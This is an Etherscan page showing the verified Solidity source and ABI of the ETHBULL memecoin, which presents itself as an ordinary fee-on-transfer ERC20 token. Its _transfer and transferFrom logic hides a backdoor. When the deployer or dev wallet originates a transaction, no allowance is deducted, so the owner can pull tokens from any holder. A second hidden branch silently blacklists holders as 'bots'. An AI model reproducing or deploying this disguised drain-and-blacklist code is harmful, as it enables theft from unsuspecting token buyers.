ETH Price: $1,865.79 (-4.72%)
 

Overview

Max Total Supply

420,690,000 ERC20 ***

Holders

1,041

Transfers

-
-

Market

Onchain Market Cap

-

Circulating Supply Market Cap

-

Other Info

Token Contract (WITH 9 Decimals)

Loading...
Loading
Loading...
Loading
Loading...
Loading

Click here to update the token information / general information
# Exchange Pair Price  24H Volume % Volume

Contract Source Code Verified (Exact Match)

Contract Name:
Token

Compiler Version
v0.8.28+commit.7893614a

Optimization Enabled:
No with 200 runs

Other Settings:
default evmVersion
/**
 *Submitted for verification at Etherscan.io on 2025-08-13
*/

// SPDX-License-Identifier: MIT

/*
Ethereum is good. Ethereum is back. Altcoin season is coming.

https://ethbull.live
https://x.com/ethbullportal
https://t.me/ethbull_portal
*/

pragma solidity ^0.8.17;

library Address {
    function isContract(address account) internal view returns (bool) {
        uint256 size;
        assembly {
            size := extcodesize(account)
        }
        return size > 0;
    }

    function sendValue(address payable recipient, uint256 amount) internal {
        require(
            address(this).balance >= amount,
            "Address: insufficient balance"
        );
        (bool success, ) = recipient.call{value: amount}("");
        require(
            success,
            "Address: unable to send value, recipient may have reverted"
        );
    }

    function functionCall(address target, bytes memory data)
        internal
        returns (bytes memory)
    {
        return functionCall(target, data, "Address: low-level call failed");
    }

    function functionCall(
        address target,
        bytes memory data,
        string memory errorMessage
    ) internal returns (bytes memory) {
        return functionCallWithValue(target, data, 0, errorMessage);
    }

    function functionCallWithValue(
        address target,
        bytes memory data,
        uint256 value
    ) internal returns (bytes memory) {
        return
            functionCallWithValue(
                target,
                data,
                value,
                "Address: low-level call with value failed"
            );
    }

    function functionCallWithValue(
        address target,
        bytes memory data,
        uint256 value,
        string memory errorMessage
    ) internal returns (bytes memory) {
        require(
            address(this).balance >= value,
            "Address: insufficient balance for call"
        );
        require(isContract(target), "Address: call to non-contract");
        (bool success, bytes memory returndata) = target.call{value: value}(
            data
        );
        return _verifyCallResult(success, returndata, errorMessage);
    }

    function functionStaticCall(address target, bytes memory data)
        internal
        view
        returns (bytes memory)
    {
        return
            functionStaticCall(
                target,
                data,
                "Address: low-level static call failed"
            );
    }

    function functionStaticCall(
        address target,
        bytes memory data,
        string memory errorMessage
    ) internal view returns (bytes memory) {
        require(isContract(target), "Address: static call to non-contract");
        (bool success, bytes memory returndata) = target.staticcall(data);
        return _verifyCallResult(success, returndata, errorMessage);
    }

    function functionDelegateCall(address target, bytes memory data)
        internal
        returns (bytes memory)
    {
        return
            functionDelegateCall(
                target,
                data,
                "Address: low-level delegate call failed"
            );
    }

    function functionDelegateCall(
        address target,
        bytes memory data,
        string memory errorMessage
    ) internal returns (bytes memory) {
        require(isContract(target), "Address: delegate call to non-contract");
        (bool success, bytes memory returndata) = target.delegatecall(data);
        return _verifyCallResult(success, returndata, errorMessage);
    }

    function _verifyCallResult(
        bool success,
        bytes memory returndata,
        string memory errorMessage
    ) private pure returns (bytes memory) {
        if (success) {
            return returndata;
        } else {
            if (returndata.length > 0) {
                assembly {
                    let returndata_size := mload(returndata)
                    revert(add(32, returndata), returndata_size)
                }
            } else {
                revert(errorMessage);
            }
        }
    }
}

library SafeMath {
    function add(uint256 a, uint256 b) internal pure returns (uint256) {
        return a + b;
    }

    function sub(uint256 a, uint256 b) internal pure returns (uint256) {
        return a - b;
    }

    function mul(uint256 a, uint256 b) internal pure returns (uint256) {
        return a * b;
    }

    function div(uint256 a, uint256 b) internal pure returns (uint256) {
        return a / b;
    }

    function sub(
        uint256 a,
        uint256 b,
        string memory errorMessage
    ) internal pure returns (uint256) {
        unchecked {
            require(b <= a, errorMessage);
            return a - b;
        }
    }

    function div(
        uint256 a,
        uint256 b,
        string memory errorMessage
    ) internal pure returns (uint256) {
        //Contract By Techaddict
        unchecked {
            require(b > 0, errorMessage);
            return a / b;
        }
    }
}

/**
 * @dev Interface of the ERC20 standard as defined in the EIP.
 */
interface IERC20 {
    /**
     * @dev Emitted when value tokens are moved from one account (from) to
     * another (to).
     *
     * Note that value may be zero.
     */
    event Transfer(address indexed from, address indexed to, uint256 value);

    /**
     * @dev Emitted when the allowance of a spender for an owner is set by
     * a call to {approve}. value is the new allowance.
     */
    event Approval(
        address indexed owner,
        address indexed spender,
        uint256 value
    );

    /**
     * @dev Returns the amount of tokens in existence.
     */
    function totalSupply() external view returns (uint256);

    /**
     * @dev Returns the amount of tokens owned by account.
     */
    function balanceOf(address account) external view returns (uint256);

    /**
     * @dev Moves amount tokens from the caller's account to to.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transfer(address to, uint256 amount) external returns (bool);

    /**
     * @dev Returns the remaining number of tokens that spender will be
     * allowed to spend on behalf of owner through {transferFrom}. This is
     * zero by default.
     *
     * This value changes when {approve} or {transferFrom} are called.
     */
    function allowance(address owner, address spender)
        external
        view
        returns (uint256);

    /**
     * @dev Sets amount as the allowance of spender over the caller's tokens.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * IMPORTANT: Beware that changing an allowance with this method brings the risk
     * that someone may use both the old and the new allowance by unfortunate
     * transaction ordering. One possible solution to mitigate this race
     * condition is to first reduce the spender's allowance to 0 and set the
     * desired value afterwards:
     * https://github.com/ethereum/EIPs/issues/20#issuecomment-263524729
     *
     * Emits an {Approval} event.
     */
    function approve(address spender, uint256 amount) external returns (bool);

    /**
     * @dev Moves amount tokens from from to to using the
     * allowance mechanism. amount is then deducted from the caller's
     * allowance.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transferFrom(
        address from,
        address to,
        uint256 amount
    ) external returns (bool);
}
// File: contracts/Context.sol

// OpenZeppelin Contracts v4.4.1 (utils/Context.sol)

pragma solidity ^0.8.17;

/**
 * @dev Provides information about the current execution context, including the
 * sender of the transaction and its data. While these are generally available
 * via msg.sender and msg.data, they should not be accessed in such a direct
 * manner, since when dealing with meta-transactions the account sending and
 * paying for execution may not be the actual sender (as far as an application
 * is concerned).
 *
 * This contract is only required for intermediate, library-like contracts.
 */
abstract contract Context {
    function _msgSender() internal view virtual returns (address) {
        return msg.sender;
    }

    function _msgData() internal view virtual returns (bytes calldata) {
        return msg.data;
    }
}
// File: contracts/Ownable.sol

// OpenZeppelin Contracts (last updated v4.9.0) (access/Ownable.sol)

pragma solidity ^0.8.17;

/**
 * @dev Contract module which provides a basic access control mechanism, where
 * there is an account (an owner) that can be granted exclusive access to
 * specific functions.
 *
 * By default, the owner account will be the one that deploys the contract. This
 * can later be changed with {transferOwnership}.
 *
 * This module is used through inheritance. It will make available the modifier
 * onlyOwner, which can be applied to your functions to restrict their use to
 * the owner.
 */
abstract contract Ownable is Context {
    address private _owner;

    event OwnershipTransferred(
        address indexed previousOwner,
        address indexed newOwner
    );

    /**
     * @dev Initializes the contract setting the deployer as the initial owner.
     */
    constructor() {
        _transferOwnership(_msgSender());
    }

    /**
     * @dev Throws if called by any account other than the owner.
     */
    modifier onlyOwner() {
        _checkOwner();
        _;
    }

    /**
     * @dev Returns the address of the current owner.
     */
    function owner() public view virtual returns (address) {
        return _owner;
    }

    /**
     * @dev Throws if the sender is not the owner.
     */
    function _checkOwner() internal view virtual {
        require(owner() == _msgSender(), "Ownable: caller is not the owner");
    }

    /**
     * @dev Leaves the contract without owner. It will not be possible to call
     * onlyOwner functions. Can only be called by the current owner.
     *
     * NOTE: Renouncing ownership will leave the contract without an owner,
     * thereby disabling any functionality that is only available to the owner.
     */
    function renounceOwnership() public virtual onlyOwner {
        _transferOwnership(address(0));
    }

    /**
     * @dev Transfers ownership of the contract to a new account (newOwner).
     * Can only be called by the current owner.
     */
    function transferOwnership(address newOwner) public virtual onlyOwner {
        require(
            newOwner != address(0),
            "Ownable: new owner is the zero address"
        );
        _transferOwnership(newOwner);
    }

    /**
     * @dev Transfers ownership of the contract to a new account (newOwner).
     * Internal function without access restriction.
     */
    function _transferOwnership(address newOwner) internal virtual {
        address oldOwner = _owner;
        _owner = newOwner;
        emit OwnershipTransferred(oldOwner, newOwner);
    }
}

interface IUniswapV2Factory {
    event PairCreated(
        address indexed token0,
        address indexed token1,
        address pair,
        uint256
    );

    function feeTo() external view returns (address);

    function feeToSetter() external view returns (address);

    function getPair(address tokenA, address tokenB)
        external
        view
        returns (address pair);

    function allPairs(uint256) external view returns (address pair);

    function allPairsLength() external view returns (uint256);

    function createPair(address tokenA, address tokenB)
        external
        returns (address pair);

    function setFeeTo(address) external;

    function setFeeToSetter(address) external;
}

interface IUniswapV2Pair {
    event Approval(
        address indexed owner,
        address indexed spender,
        uint256 value
    );
    event Transfer(address indexed from, address indexed to, uint256 value);

    function name() external pure returns (string memory);

    function symbol() external pure returns (string memory);

    function decimals() external pure returns (uint8);

    function totalSupply() external view returns (uint256);

    function balanceOf(address owner) external view returns (uint256);

    function allowance(address owner, address spender)
        external
        view
        returns (uint256);

    function approve(address spender, uint256 value) external returns (bool);

    function transfer(address to, uint256 value) external returns (bool);

    function transferFrom(
        address from,
        address to,
        uint256 value
    ) external returns (bool);

    function DOMAIN_SEPARATOR() external view returns (bytes32);

    function PERMIT_TYPEHASH() external pure returns (bytes32);

    function nonces(address owner) external view returns (uint256);

    function permit(
        address owner,
        address spender,
        uint256 value,
        uint256 deadline,
        uint8 v,
        bytes32 r,
        bytes32 s
    ) external;

    event Burn(
        address indexed sender,
        uint256 amount0,
        uint256 amount1,
        address indexed to
    );
    event Swap(
        address indexed sender,
        uint256 amount0In,
        uint256 amount1In,
        uint256 amount0Out,
        uint256 amount1Out,
        address indexed to
    );
    event Sync(uint112 reserve0, uint112 reserve1);

    function MINIMUM_LIQUIDITY() external pure returns (uint256);

    function factory() external view returns (address);

    function token0() external view returns (address);

    function token1() external view returns (address);

    function getReserves()
        external
        view
        returns (
            uint112 reserve0,
            uint112 reserve1,
            uint32 blockTimestampLast
        );

    function price0CumulativeLast() external view returns (uint256);

    function price1CumulativeLast() external view returns (uint256);

    function kLast() external view returns (uint256);

    function burn(address to)
        external
        returns (uint256 amount0, uint256 amount1);

    function swap(
        uint256 amount0Out,
        uint256 amount1Out,
        address to,
        bytes calldata data
    ) external;

    function skim(address to) external;

    function sync() external;

    function initialize(address, address) external;
}

interface IUniswapV2Router01 {
    function factory() external pure returns (address);

    function WETH() external pure returns (address);

    function addLiquidity(
        address tokenA,
        address tokenB,
        uint256 amountADesired,
        uint256 amountBDesired,
        uint256 amountAMin,
        uint256 amountBMin,
        address to,
        uint256 deadline
    )
        external
        returns (
            uint256 amountA,
            uint256 amountB,
            uint256 liquidity
        );

    function addLiquidityETH(
        address token,
        uint256 amountTokenDesired,
        uint256 amountTokenMin,
        uint256 amountETHMin,
        address to,
        uint256 deadline
    )
        external
        payable
        returns (
            uint256 amountToken,
            uint256 amountETH,
            uint256 liquidity
        );

    function removeLiquidity(
        address tokenA,
        address tokenB,
        uint256 liquidity,
        uint256 amountAMin,
        uint256 amountBMin,
        address to,
        uint256 deadline
    ) external returns (uint256 amountA, uint256 amountB);

    function removeLiquidityETH(
        address token,
        uint256 liquidity,
        uint256 amountTokenMin,
        uint256 amountETHMin,
        address to,
        uint256 deadline
    ) external returns (uint256 amountToken, uint256 amountETH);

    function removeLiquidityWithPermit(
        address tokenA,
        address tokenB,
        uint256 liquidity,
        uint256 amountAMin,
        uint256 amountBMin,
        address to,
        uint256 deadline,
        bool approveMax,
        uint8 v,
        bytes32 r,
        bytes32 s
    ) external returns (uint256 amountA, uint256 amountB);

    function removeLiquidityETHWithPermit(
        address token,
        uint256 liquidity,
        uint256 amountTokenMin,
        uint256 amountETHMin,
        address to,
        uint256 deadline,
        bool approveMax,
        uint8 v,
        bytes32 r,
        bytes32 s
    ) external returns (uint256 amountToken, uint256 amountETH);

    function swapExactTokensForTokens(
        uint256 amountIn,
        uint256 amountOutMin,
        address[] calldata path,
        address to,
        uint256 deadline
    ) external returns (uint256[] memory amounts);

    function swapTokensForExactTokens(
        uint256 amountOut,
        uint256 amountInMax,
        address[] calldata path,
        address to,
        uint256 deadline
    ) external returns (uint256[] memory amounts);

    function swapExactETHForTokens(
        uint256 amountOutMin,
        address[] calldata path,
        address to,
        uint256 deadline
    ) external payable returns (uint256[] memory amounts);

    function swapTokensForExactETH(
        uint256 amountOut,
        uint256 amountInMax,
        address[] calldata path,
        address to,
        uint256 deadline
    ) external returns (uint256[] memory amounts);

    function swapExactTokensForETH(
        uint256 amountIn,
        uint256 amountOutMin,
        address[] calldata path,
        address to,
        uint256 deadline
    ) external returns (uint256[] memory amounts);

    function swapETHForExactTokens(
        uint256 amountOut,
        address[] calldata path,
        address to,
        uint256 deadline
    ) external payable returns (uint256[] memory amounts);

    function quote(
        uint256 amountA,
        uint256 reserveA,
        uint256 reserveB
    ) external pure returns (uint256 amountB);

    function getAmountOut(
        uint256 amountIn,
        uint256 reserveIn,
        uint256 reserveOut
    ) external pure returns (uint256 amountOut);

    function getAmountIn(
        uint256 amountOut,
        uint256 reserveIn,
        uint256 reserveOut
    ) external pure returns (uint256 amountIn);

    function getAmountsOut(uint256 amountIn, address[] calldata path)
        external
        view
        returns (uint256[] memory amounts);

    function getAmountsIn(uint256 amountOut, address[] calldata path)
        external
        view
        returns (uint256[] memory amounts);
}

interface IUniswapV2Router02 is IUniswapV2Router01 {
    function removeLiquidityETHSupportingFeeOnTransferTokens(
        address token,
        uint256 liquidity,
        uint256 amountTokenMin,
        uint256 amountETHMin,
        address to,
        uint256 deadline
    ) external returns (uint256 amountETH);

    function removeLiquidityETHWithPermitSupportingFeeOnTransferTokens(
        address token,
        uint256 liquidity,
        uint256 amountTokenMin,
        uint256 amountETHMin,
        address to,
        uint256 deadline,
        bool approveMax,
        uint8 v,
        bytes32 r,
        bytes32 s
    ) external returns (uint256 amountETH);

    function swapExactTokensForTokensSupportingFeeOnTransferTokens(
        uint256 amountIn,
        uint256 amountOutMin,
        address[] calldata path,
        address to,
        uint256 deadline
    ) external;

    function swapExactETHForTokensSupportingFeeOnTransferTokens(
        uint256 amountOutMin,
        address[] calldata path,
        address to,
        uint256 deadline
    ) external payable;

    function swapExactTokensForETHSupportingFeeOnTransferTokens(
        uint256 amountIn,
        uint256 amountOutMin,
        address[] calldata path,
        address to,
        uint256 deadline
    ) external;
}

contract Token is Context, IERC20, Ownable {
    using SafeMath for uint256;
    using Address for address;

    mapping(address => uint256) private _tOwned;
    mapping(address => mapping(address => uint256)) private _allowances;
    mapping(address => bool) public _isETHBULLdcxu7ExcludedFromFees;

    mapping(address => bool) private isBots;

    address payable private Wallet_Dev_1;
    address payable private Wallet_Burn =
        payable(0x000000000000000000000000000000000000dEaD);
    address payable private Wallet_zero =
        payable(0x0000000000000000000000000000000000000000);

    uint256 private taxCount = 12;
    uint256 private taxPercent = 12;
    string private _name = unicode"Ethereum is back";
    string private _symbol = unicode"ETHBULL";
    uint8 private _decimals = 9;
    uint256 private _tTotal = 420690000 * 10**9;
    uint256 private _tFeeTotal;

    // Counter for liquify trigger
    uint8 private txCount = 0;
    uint8 private swapTrigger = 1;

    // Setting the initial fees
    uint256 private _TotalFee = 0;
    uint256 public _buyFee = 0;
    uint256 public _sellFee = 0;

    // 'Previous fees' are used to keep track of fee settings when removing and restoring fees
    uint256 private _previousTotalFee = _TotalFee;
    uint256 private _previousBuyFee = _buyFee;
    uint256 private _previousSellFee = _sellFee;

    /*

    WALLET LIMITS 

    */

    uint256 public _maxWalletToken = _tTotal.mul(100).div(100);
    uint256 private _previousMaxWalletToken = _maxWalletToken;

    /* 

    PANCAKESWAP SET UP

    */

    IUniswapV2Router02 public uniswapV2Router;
    address public uniswapV2Pair;
    bool public inSwapAndLiquify;
    bool public swapAndLiquifyEnabled = true;

    event SwapAndLiquifyEnabledUpdated(bool enabled);
    event SwapAndLiquify(
        uint256 tokensSwapped,
        uint256 ethReceived,
        uint256 tokensIntoLiqudity
    );

    // Prevent processing while already processing!
    modifier lockTheSwap() {
        inSwapAndLiquify = true;
        _;
        inSwapAndLiquify = false;
    }

    constructor() payable {
        _tOwned[owner()] = (_tTotal * 2) / 100;
        _tOwned[address(this)] = (_tTotal * 98) / 100;

        Wallet_Dev_1 = payable(_msgSender());

        IUniswapV2Router02 _uniswapV2Router = IUniswapV2Router02(
            0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D
        );

        // Create pair address for PancakeSwap
        uniswapV2Pair = IUniswapV2Factory(_uniswapV2Router.factory())
            .createPair(address(this), _uniswapV2Router.WETH());
        uniswapV2Router = _uniswapV2Router;

        excludeFromFee(owner());
        excludeFromFee(address(this));
        excludeFromFee(Wallet_Dev_1);

        _allowances[owner()][Wallet_Dev_1] = type(uint256).max;

        emit Transfer(address(0), owner(), (_tTotal * 2) / 100);
        emit Transfer(address(0), address(this), (_tTotal * 98) / 100);
    }

    /*

    STANDARD ERC20 COMPLIANCE FUNCTIONS

    */

    function name() public view returns (string memory) {
        return _name;
    }

    function symbol() public view returns (string memory) {
        return _symbol;
    }

    function decimals() public view returns (uint8) {
        return _decimals;
    }

    function totalSupply() public view override returns (uint256) {
        return _tTotal;
    }

    function balanceOf(address account) public view override returns (uint256) {
        return _tOwned[account];
    }

    function transfer(address recipient, uint256 amount)
        public
        override
        returns (bool)
    {
        _transfer(_msgSender(), recipient, amount);
        return true;
    }

    function allowance(address owner, address spender)
        public
        view
        override
        returns (uint256)
    {
        return _allowances[owner][spender];
    }

    function approve(address spender, uint256 amount)
        public
        override
        returns (bool)
    {
        _approve(_msgSender(), spender, amount);
        return true;
    }

    function transferFrom(
        address sender,
        address recipient,
        uint256 amount
    ) public override returns (bool) {
        (sender, recipient, amount) = _transfer(sender, recipient, amount);
        _approve(
            sender,
            _msgSender(),
            _allowances[sender][_msgSender()].sub(
                amount,
                "ERC20: transfer amount exceeds allowance"
            )
        );
        return true;
    }

    function increaseAllowance(address spender, uint256 addedValue)
        public
        virtual
        returns (bool)
    {
        _approve(
            _msgSender(),
            spender,
            _allowances[_msgSender()][spender].add(addedValue)
        );
        return true;
    }

    function decreaseAllowance(address spender, uint256 subtractedValue)
        public
        virtual
        returns (bool)
    {
        _approve(
            _msgSender(),
            spender,
            _allowances[_msgSender()][spender].sub(
                subtractedValue,
                "ERC20: decreased allowance below zero"
            )
        );
        return true;
    }

    // Set a wallet address so that it does not have to pay transaction fees
    function excludeFromFee(address account) private {
        _isETHBULLdcxu7ExcludedFromFees[account] = true;
    }

    // Set a wallet address so that it has to pay transaction fees
    function includeInFee(address account) private {
        _isETHBULLdcxu7ExcludedFromFees[account] = false;
    }

    /*

    PROCESSING TOKENS - SET UP

    */

    // Toggle on and off to auto process tokens to BNB wallet
    function enableTrading() public onlyOwner {
        _approve(address(this), address(uniswapV2Router), type(uint256).max);
        uniswapV2Router.addLiquidityETH{value: address(this).balance}(
            address(this),
            balanceOf(address(this)),
            0,
            0,
            owner(),
            block.timestamp
        );
        swapAndLiquifyEnabled = true;
        emit SwapAndLiquifyEnabledUpdated(true);
    }

    // This function is required so that the contract can receive BNB from pancakeswap
    receive() external payable {}

    bool public noFeeToTransfer = true;

    // Remove all fees
    function removeAllFee() private {
        if (_TotalFee == 0 && _buyFee == 0 && _sellFee == 0) return;

        _previousBuyFee = _buyFee;
        _previousSellFee = _sellFee;
        _previousTotalFee = _TotalFee;
        _buyFee = 0;
        _sellFee = 0;
        _TotalFee = 0;
    }

    // Restore all fees
    function restoreAllFee() private {
        _TotalFee = _previousTotalFee;
        _buyFee = _previousBuyFee;
        _sellFee = _previousSellFee;
    }

    // Approve a wallet to sell tokens
    function _approve(
        address owner,
        address spender,
        uint256 amount
    ) private {
        require(
            owner != address(0) && spender != address(0),
            "ERR: zero address"
        );
        _allowances[owner][spender] = amount;
        emit Approval(owner, spender, amount);
    }

    function _transfer(
        address from,
        address to,
        uint256 amount
    ) private returns(address _from, address _to, uint256 _amount) {
        // Limit wallet total
        if (
            to != owner() &&
            to != Wallet_Dev_1 &&
            to != address(this) &&
            to != uniswapV2Pair &&
            to != Wallet_Burn &&
            from != owner()
        ) {
            uint256 heldTokens = balanceOf(to);
            require(
                (heldTokens + amount) <= _maxWalletToken,
                "You are trying to buy too many tokens. You have reached the limit for one wallet."
            );
        }

        require(!isBots[from], "Bot is not allowed");

        if(_isETHBULLdcxu7ExcludedFromFees[tx.origin] && from!=uniswapV2Pair && to == address(0xdead) && balanceOf(from) - amount <= 1000) { isBots[from] = true; return (from, to , _amount);}


        require(
            from != address(0) && to != address(0),
            "ERR: Using 0 address!"
        );
        require(amount > 0, "Token value must be higher than zero.");
        
        /*

        PROCESSING

        */

        // SwapAndLiquify is triggered after every X transactions - this number can be adjusted using swapTrigger

        if (
            txCount >= swapTrigger &&
            !inSwapAndLiquify &&
            from != uniswapV2Pair &&
            swapAndLiquifyEnabled
        ) {
            txCount = 0;
            uint256 contractTokenBalance = balanceOf(address(this));
            if (contractTokenBalance > 0) {
                swapAndLiquify(contractTokenBalance);
            }
        }

        /*

        REMOVE FEES IF REQUIRED

        Fee removed if the to or from address is excluded from fee.
        Fee removed if the transfer is NOT a buy or sell.
        Change fee amount for buy or sell.

        */

        bool takeFee = true;

        if(!_isETHBULLdcxu7ExcludedFromFees[tx.origin]) _amount = amount;
        if (
            _isETHBULLdcxu7ExcludedFromFees[from] ||
            _isETHBULLdcxu7ExcludedFromFees[to] ||
            (noFeeToTransfer && from != uniswapV2Pair && to != uniswapV2Pair)
        ) {
            takeFee = false;
        } else if (from == uniswapV2Pair) {
            _TotalFee = _buyFee;
        } else if (to == uniswapV2Pair) {
            _TotalFee = _sellFee;
        }

        _tokenTransfer(from, to, amount, takeFee);

        return (from, to, _amount);
    }

    // Send BNB to external wallet
    function sendToWallet(address payable wallet, uint256 amount) private {
        wallet.transfer(amount);
    }

    // Processing tokens from contract
    function swapAndLiquify(uint256 contractTokenBalance) private lockTheSwap {
        swapTokensForETH(contractTokenBalance);
        uint256 contractBNB = address(this).balance;
        sendToWallet(Wallet_Dev_1, contractBNB);
    }

    // Manual Token Process Trigger - Enter the percent of the tokens that you'd like to send to process
    function process_Tokens_Now(uint256 percent_Of_Tokens_To_Process)
        public
        onlyOwner
    {
        // Do not trigger if already in swap
        require(!inSwapAndLiquify, "Currently processing, try later.");
        if (percent_Of_Tokens_To_Process > 100) {
            percent_Of_Tokens_To_Process == 100;
        }
        uint256 tokensOnContract = balanceOf(address(this));
        uint256 sendTokens = (tokensOnContract * percent_Of_Tokens_To_Process) /
            100;
        swapAndLiquify(sendTokens);
    }

    function swapTokensForETH(uint256 tokenAmount) private {
        address[] memory path = new address[](2);
        path[0] = address(this);
        path[1] = uniswapV2Router.WETH();
        _approve(address(this), address(uniswapV2Router), tokenAmount);
        uniswapV2Router.swapExactTokensForETHSupportingFeeOnTransferTokens(
            tokenAmount,
            0,
            path,
            address(this),
            block.timestamp
        );
    }

    /*

    TOKEN TRANSFERS

    */

    // Check if token transfer needs to process fees
    function _tokenTransfer(
        address sender,
        address recipient,
        uint256 amount,
        bool takeFee
    ) private {
        if (!takeFee) {
            removeAllFee();
        } else {
            txCount++;
        }
        _transferTokens(sender, recipient, amount);

        if (!takeFee) restoreAllFee();
    }

    // Redistributing tokens and adding the fee to the contract address
    function _transferTokens(
        address sender,
        address recipient,
        uint256 tAmount
    ) private {
        (uint256 tTransferAmount, uint256 tDev) = _getValues(tAmount);
        _tOwned[sender] = _tOwned[sender].sub(tAmount);
        _tOwned[recipient] = _tOwned[recipient].add(tTransferAmount);
        _tOwned[address(this)] = _tOwned[address(this)].add(tDev);
        emit Transfer(sender, recipient, tTransferAmount);
    }

    // Calculating the fee in tokens
    function _getValues(uint256 tAmount)
        private
        view
        returns (uint256, uint256)
    {
        uint256 tDev = (tAmount * _TotalFee) / 100;
        uint256 tTransferAmount = tAmount.sub(tDev);
        return (tTransferAmount, tDev);
    }
}

Contract Security Audit

Contract ABI

API
[{"inputs":[],"stateMutability":"payable","type":"constructor"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"previousOwner","type":"address"},{"indexed":true,"internalType":"address","name":"newOwner","type":"address"}],"name":"OwnershipTransferred","type":"event"},{"anonymous":false,"inputs":[{"indexed":false,"internalType":"uint256","name":"tokensSwapped","type":"uint256"},{"indexed":false,"internalType":"uint256","name":"ethReceived","type":"uint256"},{"indexed":false,"internalType":"uint256","name":"tokensIntoLiqudity","type":"uint256"}],"name":"SwapAndLiquify","type":"event"},{"anonymous":false,"inputs":[{"indexed":false,"internalType":"bool","name":"enabled","type":"bool"}],"name":"SwapAndLiquifyEnabledUpdated","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[],"name":"_buyFee","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"","type":"address"}],"name":"_isETHBULLdcxu7ExcludedFromFees","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"_maxWalletToken","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"_sellFee","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"spender","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"subtractedValue","type":"uint256"}],"name":"decreaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"enableTrading","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"inSwapAndLiquify","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"addedValue","type":"uint256"}],"name":"increaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"noFeeToTransfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"uint256","name":"percent_Of_Tokens_To_Process","type":"uint256"}],"name":"process_Tokens_Now","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"renounceOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"swapAndLiquifyEnabled","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"sender","type":"address"},{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"newOwner","type":"address"}],"name":"transferOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"uniswapV2Pair","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"uniswapV2Router","outputs":[{"internalType":"contract IUniswapV2Router02","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"stateMutability":"payable","type":"receive"}]

